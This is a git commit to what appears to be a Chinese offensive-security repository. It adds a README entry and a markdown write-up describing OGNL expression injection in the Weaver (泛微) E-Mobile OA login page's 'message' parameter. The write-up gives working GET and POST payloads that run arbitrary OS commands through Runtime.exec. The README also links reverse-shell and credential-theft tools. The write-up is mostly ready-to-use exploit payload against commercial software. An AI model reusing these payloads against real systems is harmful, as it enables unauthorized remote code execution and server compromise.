add 泛微e-mobile ognl注入&表达式注入.pdf

2025-06-20 18:00:35 +00:00 · 2020-03-16 11:16:15 +08:00 · 2020-03-16 11:16:15 +08:00 · ef25b845fa
commit ef25b845fa
parent e13fd58301
8 changed files with 67 additions and 3 deletions
--- a/README.md
+++ b/README.md
@ -9,7 +9,7 @@
  - [提权辅助相关](#提权辅助相关)
  - [PC](#PC)
  - [tools](#tools-小工具集合)
-  - [books](#书籍相关)
+  - [books](#书籍/文章/教程相关)
  - [说明](#%E8%AF%B4%E6%98%8E)
 ## IOT Device
@ -133,6 +133,7 @@
 - [CVE-2020-2555：WebLogic RCE漏洞POC](https://mp.weixin.qq.com/s/Wq6Fu-NlK8lzofLds8_zoA)|[CVE-2020-2555-Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE](https://github.com/Y4er/CVE-2020-2555)
 - [CVE-2020-1947-Apache ShardingSphere UI YAML解析远程代码执行漏洞](https://github.com/jas502n/CVE-2020-1947)
 - [CVE-2020-0554：phpMyAdmin后台SQL注入](./CVE-2020-0554：phpMyAdmin后台SQL注入.md)
 - [泛微E-Mobile Ognl 表达式注入](./泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf)
 ## 提权辅助相关
@ -205,7 +206,6 @@
 - [PHP解密扩展](https://github.com/Albert-Zhan/php-decrypt)
 - [linux信息收集/应急响应/常见后门检测脚本](https://github.com/al0ne/LinuxCheck)
 - [RdpThief-从远程桌面客户端提取明文凭据辅助工具](https://github.com/0x09AL/RdpThief)
 - [织梦(DEDECMS)全版本漏洞扫描](https://github.com/Mr-xn/dedecmscan)
 - [使用powershell或CMD直接运行命令反弹shell](https://github.com/ZHacker13/ReverseTCPShell)
 - [FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB弱口令检测](https://github.com/netxfly/x-crack)
 - [GitHack-.git泄露利用脚本](https://github.com/lijiejie/GitHack)
@ -259,7 +259,7 @@
 - [NodeJsScan-一款转为Nodejs进行静态代码扫描开发的工具](https://github.com/ajinabraham/NodeJsScan)
 - [一款国人根据poison ivy重写的远控](https://github.com/killeven/Poison-Ivy-Reload)
-## 书籍相关
+## 书籍/文章/教程相关
 - [windwos权限维持系列12篇PDF](./books/Window权限维持)
 - [Linux 权限维持之进程注入(需要关闭ptrace)](./books/Linux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E4%B9%8B%E8%BF%9B%E7%A8%8B%E6%B3%A8%E5%85%A5%20%C2%AB%20%E5%80%BE%E6%97%8B%E7%9A%84%E5%8D%9A%E5%AE%A2.pdf) | [在不使用ptrace的情况下，将共享库（即任意代码）注入实时Linux进程中。(不需要关闭ptrace)](https://github.com/DavidBuchanan314/dlinject)
@ -279,6 +279,7 @@
 - [国外详细的CTF分析总结文章(2014-2017年)](https://github.com/ctfs)
 - [这是一篇“不一样”的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码](./books/这是一篇"不一样"的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码-%20奇安信A-TEAM技术博客.pdf)|[原文地址](https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/)
 - [CobaltStrike4.0用户手册_中文翻译_3](./books/CobaltStrike4.0用户手册_中文翻译_3.pdf)
 - [表达式注入.pdf](./books/表达式注入.pdf)
 ## 说明
--- a/books/表达式注入.pdf
+++ b/books/表达式注入.pdf
--- a/img/55.png
+++ b/img/55.png
--- a/img/56.png
+++ b/img/56.png
--- a/img/57.png
+++ b/img/57.png
--- a/img/58.png
+++ b/img/58.png
--- a/img/59.png
+++ b/img/59.png
--- a/ognl注入.md
+++ b/ognl注入.md
@ -0,0 +1,63 @@
 ## 泛微e-mobile ognl注入
 泛微 E-Mobile 表达式注入?大概?这个洞是一个月以前，老师丢给我玩的，叫我学习一下。
 拿到的时候一脸懵逼，什么是表达式注入?去漏洞库看了一圈。
 (・。・) 噢！原来可以执行算术运算就是表达式注入呀！
 要怎么玩？当计算器用么？～ヾ(*´∇`)ﾉ
 一、泛微OA E-Mobile WebServer:**Apache** 通用部分:**apache**
 官方有两个OA。一个是**apache**的 一个是**Resin**的。
 **Resin**的也找到姿势通杀了，但是**Resin**涉及的站太大了。。。暂时不放出来，因为好像和S2撞洞了？因为045打了WAF的 ，我这个可以执行命令。23333 我也不知道~
 ```
 1、登录页面如下
 http://6.6.6.6/login.do?
 or
 http://6.6.6.6/login/login.do?
 ```
 ![](./img/55.png)
 ```
 2、当账号密码报错的时候，出现如下URL
 login.do?message=104&verify=
 ```
 ![](./img/56.png)
 ```
 3、直接改写message=的内容，试试算术运算。
 http://6.6.6.6/login.do?message=66*66*66-66666
 ```
 ![](./img/57.png)
 o(>ω<)o 这么神奇么~
 ```
 4、表达式注入。
 有的表达式注入是${code}。这里隐藏了${}，所以直接调用就行了。
 message=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())
 ```
 ![](./img/58.png)
 ```
 5、也可以通过`post`提交数据来进行注入，命令执行
 `post`如下数据也可以：
 message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami
 ```
 ![](./img/59.png)
 参考：
 http://sh0w.top/index.php/archives/14/
 http://sh0w.top/index.php/archives/39/
 https://mp.weixin.qq.com/s/EbzjQvHTl7k9flG-7lqAvA
 其他表达式相关文章：[表达式注入.pdf](./books/表达式注入.pdf)|[原文地址](https://misakikata.github.io/2018/09/表达式注入/)